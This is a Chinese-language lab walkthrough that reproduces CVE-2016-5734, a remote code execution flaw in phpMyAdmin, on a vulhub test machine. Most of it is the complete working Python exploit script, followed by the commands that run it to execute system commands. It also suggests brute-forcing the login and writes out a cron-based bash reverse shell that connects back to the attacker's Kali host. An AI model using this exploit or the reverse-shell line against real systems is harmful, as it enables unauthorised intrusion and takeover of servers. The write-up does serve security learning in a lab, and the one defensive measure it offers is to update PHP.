CVE-2016-5734 远程命令执行漏洞
环境:
靶机:
系统:centos 7-vulhub
Ip: 192.168.21.23
Kali机:
系统: Debian 10
Ip:192.168.21.33
漏洞介绍:
CVE-2016-5734在exploit-db上也就是phpMyAdmin 4.6.2 - Authenticated Remote Code Execution ,意即phpMyAdmin认证用户的远程代码执行,根据描述可知受影响的phpMyAdmin所有的4.6.x版本(直至4.6.3),4.4.x版本(直至4.4.15.7),和4.0.x版本(直至4.0.10.16)。CVE的作者利用在php5.4.7之前的版本中preg_replace函数对空字节的错误处理Bug,使注入的代码可远程执行。
影响版本:
phpmyadmin 4.6.x 版本(直至 4.6.3)
phpmyadmin 4.4.x 版本(直至 4.4.15.7)
phpmyadmin 4.0.x 版本(直至 4.0.10.16)
php版本: 4.3.0 ~5.4.6
端口方面:8080
启动vulhub环境:
Phpmyadmin4.4.15.6
主页:
过程:
- 端口扫描
22端口和8080端口开启
22是我的mobaxterm,那么我们访问8080
192.168.21.23:8080
- 8080页面-需要登录账户和密码(漏洞前提是需要我们知道用户名和密码)
可以使用暴力破解进行爆破-一般能够暴力成功
- Poc
#!/usr/bin/env python """cve-2016-5734.py: PhpMyAdmin 4.3.0 - 4.6.2 authorized user RCE exploit Details: Working only at PHP 4.3.0-5.4.6 versions, because of regex break with null byte fixed in PHP 5.4.7. CVE: CVE-2016-5734 Author: https://twitter.com/iamsecurity run: ./cve-2016-5734.py -u root --pwd="" http://localhost/pma -c "system('ls -lua');" """ import requests import argparse import sys __author__ = "@iamsecurity" if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument("url", type=str, help="URL with path to PMA") parser.add_argument("-c", "--cmd", type=str, help="PHP command(s) to eval()") parser.add_argument("-u", "--user", required=True, type=str, help="Valid PMA user") parser.add_argument("-p", "--pwd", required=True, type=str, help="Password for valid PMA user") parser.add_argument("-d", "--dbs", type=str, help="Existing database at a server") parser.add_argument("-T", "--table", type=str, help="Custom table name for exploit.") arguments = parser.parse_args() url_to_pma = arguments.url uname = arguments.user upass = arguments.pwd if arguments.dbs: db = arguments.dbs else: db = "test" token = False custom_table = False if arguments.table: custom_table = True table = arguments.table else: table = "prgpwn" if arguments.cmd: payload = arguments.cmd else: payload = "system('uname -a');" size = 32 s = requests.Session() # you can manually add proxy support it's very simple ;) # s.proxies = {'http': "127.0.0.1:8080", 'https': "127.0.0.1:8080"} s.verify = False sql = '''CREATE TABLE `{0}` ( `first` varchar(10) CHARACTER SET utf8 NOT NULL ) ENGINE=InnoDB DEFAULT CHARSET=latin1; INSERT INTO `{0}` (`first`) VALUES (UNHEX('302F6500')); '''.format(table) # get_token resp = s.post(url_to_pma + "/?lang=en", dict( pma_username=uname, pma_password=upass )) if resp.status_code is 200: token_place = resp.text.find("token=") + 6 token = resp.text[token_place:token_place + 32] if token is False: print("Cannot get valid authorization token.") sys.exit(1) if custom_table is False: data = { "is_js_confirmed": "0", "db": db, "token": token, "pos": "0", "sql_query": sql, "sql_delimiter": ";", "show_query": "0", "fk_checks": "0", "SQL": "Go", "ajax_request": "true", "ajax_page_request": "true", } resp = s.post(url_to_pma + "/import.php", data, cookies=requests.utils.dict_from_cookiejar(s.cookies)) if resp.status_code == 200: if "success" in resp.json(): if resp.json()["success"] is False: first = resp.json()["error"][resp.json()["error"].find("<code>")+6:] error = first[:first.find("</code>")] if "already exists" in error: print(error) else: print("ERROR: " + error) sys.exit(1) # build exploit exploit = { "db": db, "table": table, "token": token, "goto": "sql.php", "find": "0/e\0", "replaceWith": payload, "columnIndex": "0", "useRegex": "on", "submit": "Go", "ajax_request": "true" } resp = s.post( url_to_pma + "/tbl_find_replace.php", exploit, cookies=requests.utils.dict_from_cookiejar(s.cookies) ) if resp.status_code == 200: result = resp.json()["message"][resp.json()["message"].find("</a>")+8:] if len(result): print("result: " + result) sys.exit(0) print( "Exploit failed!\n" "Try to manually set exploit parameters like --table, --database and --token.\n" "Remember that servers with PHP version greater than 5.4.6" " is not exploitable, because of warning about null byte in regexp" ) sys.exit(1)
Kali也有自带的一些phpmyadmin 的exp可供使用
- Poc利用:
利用方法:
-u 账号 -p 密码 -c 执行代码(php代码) 默认执行uname -a python CVE-2016-5734_poc.py -u root -p root http://192.168.13.131:8080 |
- Exp执行命令
python CVE-2016-5734_poc.py -u root -p root -c "system('id')" http://192.168.21.23:8080 查看敏感目录: 创建文件: |
防御:及时更新php版本
总结一下: 因为是命令执行的漏洞,但是查看了一下权限貌似也只能做一些文件查看和新建文件,写入文件一些东西,可以利用file_put_contents(‘filename’,’content’);写入一些东西,但是我在测试过程中,即使使用复杂的一句话木马,任会被过滤掉
我觉得可以写反弹shell命令但是这个靶场没有at 和crontab 组件,所以就暂时不试了
反弹shell代码:’* * * * * bash -i >& /dev/tcp/192.168.21.33/4444 0>&1’
绝壁可以✍
后面我去试了一下,才发现我特喵没有at 和 crontab 计划任务